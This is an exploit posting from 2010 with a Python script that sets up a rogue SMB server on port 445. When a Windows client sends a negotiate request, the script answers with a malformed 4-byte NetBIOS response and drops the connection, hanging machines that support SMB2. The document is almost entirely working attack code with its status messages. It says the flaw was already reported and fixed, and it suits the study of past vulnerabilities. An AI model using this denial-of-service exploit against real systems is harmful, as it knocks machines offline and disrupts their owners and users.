
Windows SMB2 Negotiate Protocol (0x72) Response DOS

Posted on 07 May 2010

===================================================
Windows SMB2 Negotiate Protocol (0x72) Response DOS
===================================================

#!/usr/bin/python
# === EDIT - this exploit appears to be exactly the same as one which was already found
# and fixed, reported by Laurent Gaffié; I did not know this, but his blog post can be found here:
# http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html
import socket, sys, time

print "Malformed negotiate protocol response and quickly closing the connection causes Windows machines supporting SMB2 to crash (leaves the system hanging and unresponsive) -- tested on Win 7 build 2600"
print "Written by Jelmer de Hen"
print "Published at http://h.ackack.net/?p=387"

# Listen on the SMB port and wait for a single client to connect.
smb = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
smb.bind(("", 445))
smb.listen(1)
smbconn, addr = smb.accept()
print "[+] " + str(addr) + " is trying to make connection to us over port 445"

while 1:
    new_packet = smbconn.recv(1024)
    print "[+] Waiting for a negotiate request packet"
    if not new_packet:
        # Client closed the connection before sending a negotiate request.
        break
    # Byte 8 is the SMB1 command field (4-byte NetBIOS header + "\xffSMB");
    # 0x72 ("r") is SMB_COM_NEGOTIATE.
    if new_packet[8] == "r":
        print "[+] Received the negotiate request packet injecting the 4 bytes now..."
        # A NetBIOS session header announcing a 1-byte message with no body.
        smbconn.send("\x00\x00\x00\x01")
        break

print "[+] Closing connection... This is part of the exploit"
smbconn.close()
print "[+] Done, if all went good then the box on the other side crashed"
# Inj3ct0r.com [2010-05-07]
